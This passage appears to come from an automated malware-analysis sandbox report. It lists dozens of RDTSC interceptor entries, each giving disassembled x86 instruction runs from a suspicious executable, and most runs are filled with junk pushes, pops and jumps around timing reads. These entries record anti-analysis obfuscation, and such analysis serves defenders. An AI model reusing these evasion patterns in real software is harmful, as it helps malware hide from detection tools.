Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40C44 second address: 4D40C4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40C4A second address: 4D40C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40C50 second address: 4D40C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40C54 second address: 4D40C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40C64 second address: 4D40C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40C68 second address: 4D40C7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40C7D second address: 4D40CB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9DF58A6BE8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40CB0 second address: 4D40CBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40CBF second address: 4D40CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9DF58A6BE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40CD7 second address: 4D40CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40CDB second address: 4D40D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F9E67D255B6h 0x0000000e jmp 00007F9DF58A6BE7h 0x00000013 mov eax, dword ptr [ebp-0Ch] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 movzx esi, bx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40D09 second address: 4D40D28 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, dx 0x00000009 popad 0x0000000a mov dword ptr [esi+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9DF4F36020h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40D28 second address: 4D40D4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9DF58A6BE0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40D4E second address: 4D40D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40D54 second address: 4D40DB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9DF58A6BDCh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F9DF58A6BDBh 0x0000000f xor si, 151Eh 0x00000014 jmp 00007F9DF58A6BE9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push 00000001h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F9DF58A6BE8h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40DB0 second address: 4D40DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40DB4 second address: 4D40DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40DBA second address: 4D40DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40DC0 second address: 4D40DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40DC4 second address: 4D40DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40DC8 second address: 4D40E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F9DF58A6BE2h 0x00000010 sbb esi, 3FC7B4A8h 0x00000016 jmp 00007F9DF58A6BDBh 0x0000001b popfd 0x0000001c mov bx, ax 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F9DF58A6BE0h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40E0E second address: 4D40E20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9DF4F3601Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40E20 second address: 4D40E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9DF58A6BE9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40E46 second address: 4D40E5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40EFC second address: 4D40F0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40F0B second address: 4D40F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop eax 0x00000011 pushfd 0x00000012 jmp 00007F9DF4F3601Fh 0x00000017 add ax, 359Eh 0x0000001c jmp 00007F9DF4F36029h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40F60 second address: 4D40F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40F66 second address: 4D40F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40F6A second address: 4D40F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9DF58A6BE2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40F89 second address: 4D40FE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9DF4F3601Ch 0x00000009 xor ax, 99F8h 0x0000000e jmp 00007F9DF4F3601Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lea eax, dword ptr [ebx+70h] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F9DF4F36024h 0x00000021 or cx, 7458h 0x00000026 jmp 00007F9DF4F3601Bh 0x0000002b popfd 0x0000002c mov si, 250Fh 0x00000030 popad 0x00000031 push 00000001h 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40FE3 second address: 4D41018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F9DF58A6BE8h 0x0000000c sbb ch, FFFFFFE8h 0x0000000f jmp 00007F9DF58A6BDBh 0x00000014 popfd 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41018 second address: 4D4101E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4101E second address: 4D41023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41023 second address: 4D4104E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9DF4F3601Ah 0x00000008 pop esi 0x00000009 mov bx, 5C06h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9DF4F36023h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4104E second address: 4D41082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 pushfd 0x00000006 jmp 00007F9DF58A6BE0h 0x0000000b and ecx, 241CBDD8h 0x00000011 jmp 00007F9DF58A6BDBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, bh 0x00000020 push esi 0x00000021 pop edx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41082 second address: 4D410BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9DF4F36028h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D410BE second address: 4D410CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D410CD second address: 4D41123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9DF4F36023h 0x00000013 add ch, 0000006Eh 0x00000016 jmp 00007F9DF4F36029h 0x0000001b popfd 0x0000001c mov dx, si 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41123 second address: 4D41167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F9DF58A6BE0h 0x0000000f call 00007F9DF58A6BE2h 0x00000014 push esi 0x00000015 pop ebx 0x00000016 pop esi 0x00000017 popad 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F9DF58A6BDFh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41167 second address: 4D41184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D411D0 second address: 4D411D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D411D6 second address: 4D41274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9DF4F36024h 0x00000012 adc ch, 00000028h 0x00000015 jmp 00007F9DF4F3601Bh 0x0000001a popfd 0x0000001b mov dx, ax 0x0000001e popad 0x0000001f test edi, edi 0x00000021 jmp 00007F9DF4F36022h 0x00000026 js 00007F9E673B4495h 0x0000002c jmp 00007F9DF4F36020h 0x00000031 mov eax, dword ptr [ebp-14h] 0x00000034 jmp 00007F9DF4F36020h 0x00000039 mov ecx, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F9DF4F36027h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41274 second address: 4D4127A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4127A second address: 4D4127E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4127E second address: 4D41300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b jmp 00007F9DF58A6BE7h 0x00000010 mov edx, 772406ECh 0x00000015 jmp 00007F9DF58A6BE6h 0x0000001a sub eax, eax 0x0000001c jmp 00007F9DF58A6BE1h 0x00000021 lock cmpxchg dword ptr [edx], ecx 0x00000025 jmp 00007F9DF58A6BDEh 0x0000002a pop edi 0x0000002b jmp 00007F9DF58A6BE0h 0x00000030 test eax, eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov bx, A980h 0x00000039 mov edi, 5DE9DDACh 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41300 second address: 4D41306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41306 second address: 4D41395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F9E67D24F9Ah 0x00000011 jmp 00007F9DF58A6BE0h 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 jmp 00007F9DF58A6BE0h 0x0000001e mov eax, dword ptr [esi] 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F9DF58A6BDEh 0x00000027 adc ch, 00000058h 0x0000002a jmp 00007F9DF58A6BDBh 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F9DF58A6BE8h 0x00000036 and cx, 37B8h 0x0000003b jmp 00007F9DF58A6BDBh 0x00000040 popfd 0x00000041 popad 0x00000042 mov dword ptr [edx], eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41395 second address: 4D413B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D413B0 second address: 4D413D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D413D6 second address: 4D413DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D413DA second address: 4D413DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D413DE second address: 4D413E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D413E4 second address: 4D41425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [edx+04h], eax 0x0000000d jmp 00007F9DF58A6BE8h 0x00000012 mov eax, dword ptr [esi+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9DF58A6BE7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41425 second address: 4D41485 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007F9DF4F3601Dh 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 jmp 00007F9DF4F3601Eh 0x00000019 mov dword ptr [edx+0Ch], eax 0x0000001c jmp 00007F9DF4F36020h 0x00000021 mov eax, dword ptr [esi+10h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov esi, edi 0x00000029 call 00007F9DF4F36029h 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41485 second address: 4D4148B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4148B second address: 4D414B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D414B2 second address: 4D414B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D414B8 second address: 4D414D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36024h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D414D9 second address: 4D414DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D414DD second address: 4D414E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D414E3 second address: 4D41517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9DF58A6BE2h 0x00000008 mov ax, 3651h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+14h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9DF58A6BE3h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41517 second address: 4D4151D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4151D second address: 4D41521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41521 second address: 4D41532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41532 second address: 4D41536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41536 second address: 4D4153C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4153C second address: 4D4159E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+18h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e call 00007F9DF58A6BE2h 0x00000013 pop ecx 0x00000014 mov al, bl 0x00000016 popad 0x00000017 mov edi, esi 0x00000019 popad 0x0000001a mov eax, dword ptr [esi+1Ch] 0x0000001d pushad 0x0000001e jmp 00007F9DF58A6BDBh 0x00000023 popad 0x00000024 mov dword ptr [edx+1Ch], eax 0x00000027 pushad 0x00000028 push ecx 0x00000029 movsx ebx, cx 0x0000002c pop eax 0x0000002d jmp 00007F9DF58A6BDDh 0x00000032 popad 0x00000033 mov eax, dword ptr [esi+20h] 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b mov edx, 5812EC3Ch 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4159E second address: 4D41600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c jmp 00007F9DF4F36020h 0x00000011 mov eax, dword ptr [esi+24h] 0x00000014 jmp 00007F9DF4F36020h 0x00000019 mov dword ptr [edx+24h], eax 0x0000001c pushad 0x0000001d movzx eax, bx 0x00000020 popad 0x00000021 mov eax, dword ptr [esi+28h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F9DF4F36027h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41600 second address: 4D4161D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4161D second address: 4D41665 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c jmp 00007F9DF4F3601Eh 0x00000011 mov ecx, dword ptr [esi+2Ch] 0x00000014 jmp 00007F9DF4F36020h 0x00000019 mov dword ptr [edx+2Ch], ecx 0x0000001c pushad 0x0000001d mov edi, eax 0x0000001f popad 0x00000020 mov ax, word ptr [esi+30h] 0x00000024 pushad 0x00000025 push edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41665 second address: 4D416B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F9DF58A6BE7h 0x0000000b sub cx, 5CFEh 0x00000010 jmp 00007F9DF58A6BE9h 0x00000015 popfd 0x00000016 popad 0x00000017 mov word ptr [edx+30h], ax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F9DF58A6BDDh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D416B5 second address: 4D416E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d jmp 00007F9DF4F3601Eh 0x00000012 mov word ptr [edx+32h], ax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D416E6 second address: 4D416EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
